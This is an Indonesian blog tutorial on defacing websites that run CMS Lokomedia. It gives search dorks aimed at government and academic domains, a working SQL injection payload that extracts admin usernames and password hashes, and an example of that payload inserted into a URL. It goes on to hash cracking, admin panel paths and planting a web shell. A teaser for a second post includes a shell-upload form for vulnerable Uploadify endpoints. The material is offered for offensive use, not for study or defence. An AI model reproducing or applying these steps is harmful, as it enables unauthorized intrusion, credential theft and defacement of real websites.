DYCAL NOTES Tutorial Deface SQLi CMS Lokomedia


DYCAL NOTES
⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇⬇


Tutorial Deface SQLi CMS Lokomedia

Add Facebook Me
Facebook.com/Mr.Cyrus404


Berbicara soal teknik SQLi CMS Lokomedia ini, pasti sudah kesohor di kalangan defacer/hacker tanah air. Terlebih lagi sekarang ini yg semakin banyak defacer yang mengexploit CMS Lokomedia ini. Ga usah panjang lebar langsung ke topik pembahasan yaitu "Tutorial Deface SQLi CMS Lokomedia"

Bahan :
1. Dork :
inurl:statis-1-profil.html
inurl:statis-2-profil.html
inurl:statis-3-strukturorganisasi.html
Note : tambahkan site:org site:net :site:go.id site:ac.id site:id
(Use Your Brain)

2. Exploit SQLi (SQL Injection) :

'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Bingung cara ngexploit nya ?? sini di kasih tau :v
contoh :

http://sitepemerintah.co.li/statis-2-profil.html

kamu tambahin exploit nya sesudah angka jadi kaya gini :

http://sitepemerintah.co.li/statis-2'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

ngerti kan ??

3. MD5 Decrypter :
MD5 Decrypt nya pake otak kamu sendiri aja :v tenang ada tool online nya kok
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/

Tutorial :
1. Dorking pake dork di atas,

2. Cari targetnya, setelah ketemu masukin inject nya ! seperti contoh di atas

3. Jika Vuln akan ada kode MD5 di tab bar (liat gambar aja biar jelas)


4. Lalu kamu pencet CTRL+U lalu kamu copykan kode MD5 tersebut, lalu decrypt di MD5 Decrypter

5. Tinggal cari dimana tempat login admin nya :) biasanya ada di :
http://target-suka.co.li/admin/
http://target-suka.co.li/adminweb/
http://target-suka.co.li/admininistrator/

6. Untuk Nanem shell ?? User Your Brain Kids !! (Jgn mau nya di suapin mulu)

7. Akses shell ?? setelah nanem shell klik kanan gambar yang ancur lalu klik view image

8. Jangan lupa nitip nick _Tuan2Fay_ - Yukinoshita 47 - Snooze - TM_404 - Geonyc X

Note : tapi saya sarankan sebelum melakukan inject terhadap target, lebih baik cari dlu login adminnya :)

Karena CMS Lokomedia ini dipakai oleh web indonesia, mohon bantuan untuk tidak merusak !!
Hargai Para webmaster tanah air ini

Mohon maaf kaga ada gambar nya, karna saat saya eksekusi target saya lupa di screenshots :v

Komentar

Posting Komentar

Postingan populer dari blog ini

DYCAL NOTES Tutorial Deface Teknik Uploadify Vulnerability Upload Shell

Gambar
DYCAL NOTES Tutorial Deface Teknik Uploadify Vulnerability Upload Shell Ini memang metode deface lama, tapi masih banyak kok yang pakai teknik ini :). Simak aja Tutorialnya Bahan-Bahan : PC/Laptop Koneksi Internet CSRF Dork Shell (kalo blm punya cari di gugel) Dork : inurl:/uploadify/ intitle:index of    (bisa di kembangkan lagi) CSRF : <form method="post" action="urltarget"> enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="Filedata" ><br> <input type="submit" name="submit" value="Tusbol"> </form> Atau CSRF online di http://mouncyler-community.hol.es/expl/ lalu kalian pilih Filedata Tutorial : 1. Copy CSRF di atas lalu save dengan format .html 2. Dorking 3. Cari target, lalu cek apakah ada uploadify.php ?? (web yg vuln cirinya laman yg kosong/blank) 4. Edit CSRF yg tadi dah...
Baca selengkapnya

DYCAL NOTES Warga Memadati Sekitar Lokasi Bom Bunuh Diri Kampung Melayu

Gambar
Warga Memadati Sekitar Lokasi Bom Bunuh Diri Kampung Melayu DYC4L N0TES Lokasi ledakan dugaan bom bunuh diri di Halte Transjakarta Kampung Melayu, Jakarta Timur sudah dipasangi garis polisi. Sejumlah personel polisi pun telah berada di lokasi. Garis pembatas lokasi ledakan terpasang melintang sepanjang jalur khusus Transjakarta. Tampak di halte yang sudah berlubang akibat ledakan sudah dipenuhi polisi. Mereka terpantau tengah beraktivitas di dalam halte. Sedangkan warga terlihat memenuhi sekitar kawasan terjadinya ledakan. Beberapa pengguna jalan bahkan sampai memarkirkan kendaraannya untuk melihat tempat itu. Situasi lalu lintas di dekat lokasi tampak macet. Selain menghalau warga agar tidak semakin mendekat, arus lalu lintas juga coba diurai polisi.
Baca selengkapnya